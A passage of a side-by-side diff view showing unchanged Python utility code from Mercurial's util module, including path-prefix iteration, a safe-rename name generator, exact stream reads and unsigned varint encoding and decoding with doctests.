3532 3536 return iter(self._dirs)
3533 3537
3534 3538 def __contains__(self, d):
3535 3539 return d in self._dirs
3536 3540
3537 3541
3538 3542 if safehasattr(parsers, 'dirs'):
3539 3543 dirs = parsers.dirs
3540 3544
3541 3545 if rustdirs is not None:
3542 3546 dirs = rustdirs
3543 3547
3544 3548
3545 3549 def finddirs(path):
3546 3550 pos = path.rfind(b'/')
3547 3551 while pos != -1:
3548 3552 yield path[:pos]
3549 3553 pos = path.rfind(b'/', 0, pos)
3550 3554 yield b''
3551 3555
3552 3556
3553 3557 # convenient shortcut
3554 3558 dst = debugstacktrace
3555 3559
3556 3560
3557 3561 def safename(f, tag, ctx, others=None):
3558 3562 """
3559 3563 Generate a name that it is safe to rename f to in the given context.
3560 3564
3561 3565 f: filename to rename
3562 3566 tag: a string tag that will be included in the new name
3563 3567 ctx: a context, in which the new name must not exist
3564 3568 others: a set of other filenames that the new name must not be in
3565 3569
3566 3570 Returns a file name of the form oldname~tag[~number] which does not exist
3567 3571 in the provided context and is not in the set of other names.
3568 3572 """
3569 3573 if others is None:
3570 3574 others = set()
3571 3575
3572 3576 fn = b'%s~%s' % (f, tag)
3573 3577 if fn not in ctx and fn not in others:
3574 3578 return fn
3575 3579 for n in itertools.count(1):
3576 3580 fn = b'%s~%s~%s' % (f, tag, n)
3577 3581 if fn not in ctx and fn not in others:
3578 3582 return fn
3579 3583
3580 3584
3581 3585 def readexactly(stream, n):
3582 3586 '''read n bytes from stream.read and abort if less was available'''
3583 3587 s = stream.read(n)
3584 3588 if len(s) < n:
3585 3589 raise error.Abort(
3586 3590 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3587 3591 % (len(s), n)
3588 3592 )
3589 3593 return s
3590 3594
3591 3595
3592 3596 def uvarintencode(value):
3593 3597 """Encode an unsigned integer value to a varint.
3594 3598
3595 3599 A varint is a variable length integer of 1 or more bytes. Each byte
3596 3600 except the last has the most significant bit set. The lower 7 bits of
3597 3601 each byte store the 2's complement representation, least significant group
3598 3602 first.
3599 3603
3600 3604 >>> uvarintencode(0)
3601 3605 '\\x00'
3602 3606 >>> uvarintencode(1)
3603 3607 '\\x01'
3604 3608 >>> uvarintencode(127)
3605 3609 '\\x7f'
3606 3610 >>> uvarintencode(1337)
3607 3611 '\\xb9\\n'
3608 3612 >>> uvarintencode(65536)
3609 3613 '\\x80\\x80\\x04'
3610 3614 >>> uvarintencode(-1)
3611 3615 Traceback (most recent call last):
3612 3616 ...
3613 3617 ProgrammingError: negative value for uvarint: -1
3614 3618 """
3615 3619 if value < 0:
3616 3620 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3617 3621 bits = value & 0x7F
3618 3622 value >>= 7
3619 3623 bytes = []
3620 3624 while value:
3621 3625 bytes.append(pycompat.bytechr(0x80 | bits))
3622 3626 bits = value & 0x7F
3623 3627 value >>= 7
3624 3628 bytes.append(pycompat.bytechr(bits))
3625 3629
3626 3630 return b''.join(bytes)
3627 3631
3628 3632
3629 3633 def uvarintdecodestream(fh):
3630 3634 """Decode an unsigned variable length integer from a stream.
3631 3635
3632 3636 The passed argument is anything that has a ``.read(N)`` method.
3633 3637
3634 3638 >>> try:
3635 3639 ... from StringIO import StringIO as BytesIO
3636 3640 ... except ImportError:
3637 3641 ... from io import BytesIO
3638 3642 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3639 3643 0
3640 3644 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3641 3645 1
3642 3646 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3643 3647 127
3644 3648 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3645 3649 1337
3646 3650 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3647 3651 65536
3648 3652 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3649 3653 Traceback (most recent call last):
3650 3654 ...
3651 3655 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3652 3656 """
3653 3657 result = 0
3654 3658 shift = 0
3655 3659 while True:
3656 3660 byte = ord(readexactly(fh, 1))
3657 3661 result |= (byte & 0x7F) << shift
3658 3662 if not (byte & 0x80):
3659 3663 return result
3660 3664 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now